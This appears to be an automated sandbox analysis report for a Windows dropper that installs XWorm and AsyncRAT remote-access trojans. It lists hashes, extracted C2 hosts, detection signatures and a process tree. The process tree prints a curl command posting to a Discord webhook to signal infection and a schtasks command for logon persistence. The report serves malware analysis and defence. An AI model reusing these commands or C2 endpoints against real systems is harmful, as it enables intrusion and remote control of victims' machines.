Analysis
max time kernel: 5s
max time network: 7s
platform: windows10-2004_x64
resource: win10v2004-20240611-en
resource tags: arch:x64 arch:x86 image:win10v2004-20240611-en locale:en-us os:windows10-2004-x64 system
submitted: 22-06-2024 05:28
Static task: static1
Behavioral task: behavioral1
Sample: Dropper.exe
Resource: win7-20240221-en
Errors: none
General
Target: Dropper.exe
Size: 1.4MB
MD5: afbd173e05ef8ddabbe10b90f93b6614
SHA1: 718220c153e1eba3d978eb7d2eb884716797be9f
SHA256: 9d89f838ab73933fc7a35b409e022dbb33e11c94c306ecfe9710e8ed3a82946e
SHA512: 5d4f4dcbdf4acbdd84c3da5a8351ff5db0c5091dcb94eb6dfb7b019e0ba342bf74e0bd3eb5b4484e6247561e7325be90e8433ee42137e6cf56fc1d76f29eb31f
SSDEEP: 12288:C0w1hc0h3LOAGkjwtBx5n4AYakafNh/ymPj/YDLm7GylDULvEd8oK/mngAmgIv:CCmwDRPjwuB
Malware Config
Extracted: xworm
C2: politics-fiber.gl.at.ply.gg:47430
Install_directory: %AppData%
install_file: $77-scchost.exe
Extracted: asyncrat
Default
C2: environmental-blank.gl.at.ply.gg:25944
delay: 1
install: true
install_file: $77-aachost.exe
install_folder: %AppData%
Signatures
Detect Xworm Payload (2 IoCs)
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | family_xworm
behavioral2/memory/3320-65-0x0000000000A80000-0x0000000000A92000-memory.dmp | family_xworm

Async RAT payload (1 IoC)
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe | family_asyncrat

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | Dropper.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | $77-aachost.exe

Executes dropped EXE (4 IoCs)
pid | process
3320 | $77-sdchost.exe
4984 | $77-aachost.exe
756 | $77-penisballs.exe
1724 | $77-install.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)

Drops file in System32 directory (2 IoCs)
description | ioc | process
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Modifies data under HKEY_USERS (41 IoCs)
Processes: powershell.EXE
Modifies registry class (1 IoC)
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | Dropper.exe

Scheduled Task/Job: Scheduled Task (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.

Suspicious behavior: EnumeratesProcesses (26 IoCs)
pid | process | occurrences
4528 | powershell.EXE | 2
4984 | $77-aachost.exe | 22
756 | $77-penisballs.exe | 2

Suspicious use of AdjustPrivilegeToken (7 IoCs)
description | pid | process
Token: SeDebugPrivilege | 3320 | $77-sdchost.exe
Token: SeDebugPrivilege | 756 | $77-penisballs.exe
Token: SeDebugPrivilege | 4528 | powershell.EXE
Token: SeDebugPrivilege | 4984 | $77-aachost.exe
Token: SeDebugPrivilege | 4984 | $77-aachost.exe
Token: SeShutdownPrivilege | 4984 | $77-aachost.exe
Token: SeDebugPrivilege | 4528 | powershell.EXE

Suspicious use of SetWindowsHookEx (1 IoC)
pid | process
756 | $77-penisballs.exe

Suspicious use of WriteProcessMemory (19 IoCs)
description | pid | process | target process | occurrences
PID 2144 wrote to memory of 1488 | 2144 | Dropper.exe | cmd.exe | 3
PID 1488 wrote to memory of 540 | 1488 | cmd.exe | curl.exe | 3
PID 2144 wrote to memory of 3320 | 2144 | Dropper.exe | $77-sdchost.exe | 2
PID 2144 wrote to memory of 4984 | 2144 | Dropper.exe | $77-aachost.exe | 2
PID 2144 wrote to memory of 756 | 2144 | Dropper.exe | $77-penisballs.exe | 2
PID 2144 wrote to memory of 1724 | 2144 | Dropper.exe | $77-install.exe | 3
PID 4984 wrote to memory of 4028 | 4984 | $77-aachost.exe | cmd.exe | 2
PID 4028 wrote to memory of 4196 | 4028 | cmd.exe | schtasks.exe | 2
Processes (indented by process-tree depth)
C:\Users\Admin\AppData\Local\Temp\Dropper.exe
command line: "C:\Users\Admin\AppData\Local\Temp\Dropper.exe"
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\cmd.exe
  command line: "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
  - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\curl.exe
    command line: curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
  C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
    C:\Windows\System32\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit
    - Suspicious use of WriteProcessMemory
      C:\Windows\system32\schtasks.exe
      command line: schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'
      - Scheduled Task/Job: Scheduled Task
  C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  C:\Users\Admin\AppData\Local\Temp\$77-install.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\$77-install.exe"
  - Executes dropped EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
command line: powershell.EXE "<obfuscated PowerShell one-liner, omitted>"
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Downloads
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
Filesize: 66KB
MD5: 499861c56b2368cb123c027336370b92
SHA1: c018376876cc5906681502bdc4c313e9ce4bd6ad
SHA256: 146a6db11db984e114e8942aa9a684f3c33c8348029cc1406754f134adbb3930
SHA512: c585a7e0cf0c860863699a13ae6843babbf13b13246715e9ae5ba8296b4037ee839c09b3648250c6a3687ee01e2ad5a65ebc77aabd42bd3ad7398d6b57f9e077

C:\Users\Admin\AppData\Local\Temp\$77-install.exe
Filesize: 163KB
MD5: 1a7d1b5d24ba30c4d3d5502295ab5e89
SHA1: 2d5e69cf335605ba0a61f0bbecbea6fc06a42563
SHA256: b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
SHA512: 859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa

C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
Filesize: 256KB
MD5: 18f497deffe88b6b2cff336a277aface
SHA1: 4e1413241d3d3e4dbff399d179f8fd64f3ecd39e
SHA256: 8133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5
SHA512: 35c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d

C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
Filesize: 50KB
MD5: 77a71f3a441aa3bf824967e52413bec5
SHA1: c3d6df5cfc5eefaadf9bcb3703484e3cadf79588
SHA256: 1e6c87e492d90fbc4b9d2a16676a58735e33861f780c6c3020869337a0ccfc82
SHA512: 31c413cb410b366b63f0e763e288c2795584f9c7fda41eeea45f7d32a853da87e3ab58a144ff02a75b1d1803c7fef9fe3d561133a50a4e600799ed6f9050fd5b

C:\Windows\Temp\__PSScriptPolicyTest_g3hgnhhh.oug.ps1
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Memory dumps
memory/756-188-0x0000000000F50000-0x0000000000F96000-memory.dmp | Filesize: 280KB
memory/756-216-0x0000000002EF0000-0x0000000002EF6000-memory.dmp | Filesize: 24KB
memory/2144-1-0x0000000000480000-0x00000000005F0000-memory.dmp | Filesize: 1.4MB
memory/2144-0-0x00000000744DE000-0x00000000744DF000-memory.dmp | Filesize: 4KB
memory/3320-65-0x0000000000A80000-0x0000000000A92000-memory.dmp | Filesize: 72KB
memory/3320-64-0x00007FFFFA653000-0x00007FFFFA655000-memory.dmp | Filesize: 8KB
memory/4528-222-0x000001F4B48E0000-0x000001F4B4902000-memory.dmp | Filesize: 136KB
memory/4528-231-0x000001F4B4C80000-0x000001F4B4CAA000-memory.dmp | Filesize: 168KB
memory/4528-232-0x00007FF8195D0000-0x00007FF8197C5000-memory.dmp | Filesize: 2.0MB
memory/4528-233-0x00007FF819190000-0x00007FF81924E000-memory.dmp | Filesize: 760KB
memory/4528-234-0x00007FF643530000-0x00007FF6435A1000-memory.dmp | Filesize: 452KB
memory/4984-127-0x0000000000600000-0x0000000000616000-memory.dmp | Filesize: 88KB